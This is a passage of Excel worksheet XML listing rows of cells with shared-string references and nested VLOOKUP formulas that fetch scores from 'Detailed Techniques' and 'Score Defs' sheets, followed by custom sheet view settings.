        <f>IF(ISNA(VLOOKUP(VLOOKUP(A40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C40" s="5"/>
      <c r="D40" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E40" s="12" t="s">
        <v>124</v>
      </c>
      <c r="F40" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G40" s="5"/>
      <c r="H40" s="5"/>
      <c r="I40" s="5"/>
      <c r="J40" s="5"/>
      <c r="K40" s="5"/>
      <c r="L40" s="5"/>
      <c r="M40" s="5"/>
      <c r="N40" s="5"/>
      <c r="O40" s="5"/>
      <c r="P40" s="5"/>
      <c r="Q40" s="5"/>
      <c r="R40" s="5"/>
      <c r="S40" s="5"/>
      <c r="T40" s="5"/>
      <c r="V40" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U40,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="41" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A41" s="12" t="s">
        <v>171</v>
      </c>
      <c r="B41" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C41" s="5"/>
      <c r="D41" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E41" s="12" t="s">
        <v>140</v>
      </c>
      <c r="F41" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G41" s="5"/>
      <c r="H41" s="5"/>
      <c r="I41" s="5"/>
      <c r="J41" s="5"/>
      <c r="K41" s="5"/>
      <c r="L41" s="5"/>
      <c r="M41" s="5"/>
      <c r="N41" s="5"/>
      <c r="O41" s="5"/>
      <c r="P41" s="5"/>
      <c r="Q41" s="5"/>
      <c r="R41" s="5"/>
      <c r="S41" s="5"/>
      <c r="T41" s="5"/>
      <c r="V41" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U41,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="42" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A42" s="12" t="s">
        <v>173</v>
      </c>
      <c r="B42" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C42" s="5"/>
      <c r="D42" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E42" s="12" t="s">
        <v>215</v>
      </c>
      <c r="F42" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G42" s="5"/>
      <c r="H42" s="5"/>
      <c r="I42" s="5"/>
      <c r="J42" s="5"/>
      <c r="K42" s="5"/>
      <c r="L42" s="5"/>
      <c r="M42" s="5"/>
      <c r="N42" s="5"/>
      <c r="O42" s="5"/>
      <c r="P42" s="5"/>
      <c r="Q42" s="5"/>
      <c r="R42" s="5"/>
      <c r="S42" s="5"/>
      <c r="T42" s="5"/>
      <c r="V42" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U42,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="43" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A43" s="12" t="s">
        <v>178</v>
      </c>
      <c r="B43" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C43" s="5"/>
      <c r="D43" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E43" s="12" t="s">
        <v>160</v>
      </c>
      <c r="F43" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G43" s="5"/>
      <c r="H43" s="5"/>
      <c r="I43" s="5"/>
      <c r="J43" s="5"/>
      <c r="K43" s="5"/>
      <c r="L43" s="5"/>
      <c r="M43" s="5"/>
      <c r="N43" s="5"/>
      <c r="O43" s="5"/>
      <c r="P43" s="5"/>
      <c r="Q43" s="5"/>
      <c r="R43" s="5"/>
      <c r="S43" s="5"/>
      <c r="T43" s="5"/>
      <c r="V43" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U43,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="44" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A44" s="12" t="s">
        <v>216</v>
      </c>
      <c r="B44" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C44" s="5"/>
      <c r="D44" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E44" s="12" t="s">
        <v>217</v>
      </c>
      <c r="F44" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G44" s="5"/>
      <c r="H44" s="5"/>
      <c r="I44" s="5"/>
      <c r="J44" s="5"/>
      <c r="K44" s="5"/>
      <c r="L44" s="5"/>
      <c r="M44" s="5"/>
      <c r="N44" s="5"/>
      <c r="O44" s="5"/>
      <c r="P44" s="5"/>
      <c r="Q44" s="5"/>
      <c r="R44" s="5"/>
      <c r="S44" s="5"/>
      <c r="T44" s="5"/>
      <c r="V44" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U44,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="45" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A45" s="12" t="s">
        <v>218</v>
      </c>
      <c r="B45" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C45" s="5"/>
      <c r="D45" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E45" s="12" t="s">
        <v>176</v>
      </c>
      <c r="F45" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G45" s="5"/>
      <c r="H45" s="5"/>
      <c r="I45" s="5"/>
      <c r="J45" s="5"/>
      <c r="K45" s="5"/>
      <c r="L45" s="5"/>
      <c r="M45" s="5"/>
      <c r="N45" s="5"/>
      <c r="O45" s="5"/>
      <c r="P45" s="5"/>
      <c r="Q45" s="5"/>
      <c r="R45" s="5"/>
      <c r="S45" s="5"/>
      <c r="T45" s="5"/>
      <c r="V45" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U45,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="46" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A46" s="8" t="s">
        <v>219</v>
      </c>
      <c r="B46" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="C46" s="5"/>
      <c r="D46" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E46" s="12" t="s">
        <v>173</v>
      </c>
      <c r="F46" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="G46" s="5"/>
      <c r="H46" s="5"/>
      <c r="I46" s="5"/>
      <c r="J46" s="5"/>
      <c r="K46" s="5"/>
      <c r="L46" s="5"/>
      <c r="M46" s="5"/>
      <c r="N46" s="5"/>
      <c r="O46" s="5"/>
      <c r="P46" s="5"/>
      <c r="Q46" s="5"/>
      <c r="R46" s="5"/>
      <c r="S46" s="5"/>
      <c r="T46" s="5"/>
      <c r="V46" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U46,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="47" spans="1:22" x14ac:dyDescent="0.45">
      <c r="A47" s="8" t="s">
        <v>190</v>
      </c>
      <c r="B47" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D47" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E47" s="12" t="s">
        <v>185</v>
      </c>
      <c r="F47" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="V47" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(U47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(U47,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="48" spans="1:22" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A48" s="8" t="s">
        <v>150</v>
      </c>
      <c r="B48" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A48,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A48,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D48" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C48,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C48,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E48" s="8" t="s">
        <v>187</v>
      </c>
      <c r="F48" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E48,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E48,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A49" s="8" t="s">
        <v>220</v>
      </c>
      <c r="B49" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A49,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A49,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D49" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C49,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C49,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E49" s="8" t="s">
        <v>192</v>
      </c>
      <c r="F49" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E49,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E49,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A50" s="8" t="s">
        <v>189</v>
      </c>
      <c r="B50" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A50,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A50,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D50" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C50,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C50,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E50" s="8" t="s">
        <v>221</v>
      </c>
      <c r="F50" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E50,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E50,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A51" s="8" t="s">
        <v>192</v>
      </c>
      <c r="B51" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A51,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A51,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D51" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C51,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C51,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E51" s="8" t="s">
        <v>194</v>
      </c>
      <c r="F51" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E51,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E51,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A52" s="8" t="s">
        <v>222</v>
      </c>
      <c r="B52" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A52,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A52,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D52" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C52,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C52,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E52" s="8" t="s">
        <v>197</v>
      </c>
      <c r="F52" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E52,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E52,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A53" s="8" t="s">
        <v>223</v>
      </c>
      <c r="B53" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A53,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A53,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D53" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C53,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C53,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E53" s="8" t="s">
        <v>222</v>
      </c>
      <c r="F53" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E53,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E53,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:6" ht="28.5" x14ac:dyDescent="0.45">
      <c r="A54" s="8" t="s">
        <v>172</v>
      </c>
      <c r="B54" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A54,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A54,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="D54" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(C54,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(C54,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E54" s="8" t="s">
        <v>223</v>
      </c>
      <c r="F54" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E54,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E54,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A55" s="8" t="s">
        <v>224</v>
      </c>
      <c r="B55" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A55,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A55,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E55" s="8" t="s">
        <v>225</v>
      </c>
      <c r="F55" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E55,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E55,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.45">
      <c r="A56" s="8" t="s">
        <v>226</v>
      </c>
      <c r="B56" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A56,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A56,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
      <c r="E56" s="8" t="s">
        <v>172</v>
      </c>
      <c r="F56" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E56,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E56,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.45">
      <c r="B57" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A57,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A57,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E57" s="8" t="s">
        <v>227</v>
      </c>
      <c r="F57" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E57,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E57,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="28.5" x14ac:dyDescent="0.45">
      <c r="B58" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A58,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A58,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E58" s="8" t="s">
        <v>228</v>
      </c>
      <c r="F58" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E58,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E58,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.45">
      <c r="B59" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A59,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A59,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E59" s="8" t="s">
        <v>205</v>
      </c>
      <c r="F59" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E59,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E59,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.45">
      <c r="B60" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A60,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A60,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="E60" s="8" t="s">
        <v>208</v>
      </c>
      <c r="F60" s="5">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E60,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E60,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.45">
      <c r="B61" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(A61,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(A61,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
      <c r="F61" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E61,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E61,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.45">
      <c r="F62" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E62,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E62,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.45">
      <c r="F63" s="5" t="str">
        <f>IF(ISNA(VLOOKUP(VLOOKUP(E63,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0)),"",VLOOKUP(VLOOKUP(E63,'Detailed Techniques'!$A:$G,7,0),'Score Defs'!$A:$B,2,0))</f>
        <v/>
      </c>
    </row>
  </sheetData>
  <dataConsolidate/>
  <customSheetViews>
    <customSheetView guid="{06890A0B-BA60-4C45-92A5-6A3F65A6AC54}" scale="82" showGridLines="0" hiddenColumns="1" topLeftCell="A3">
      <selection activeCell="G8" sqref="G8"/>
      <pageMargins left="0" right="0" top="0" bottom="0" header="0" footer="0"/>
      <pageSetup orientation="portrait" r:id="rId1"/>
    </customSheetView>
  </customSheetViews>
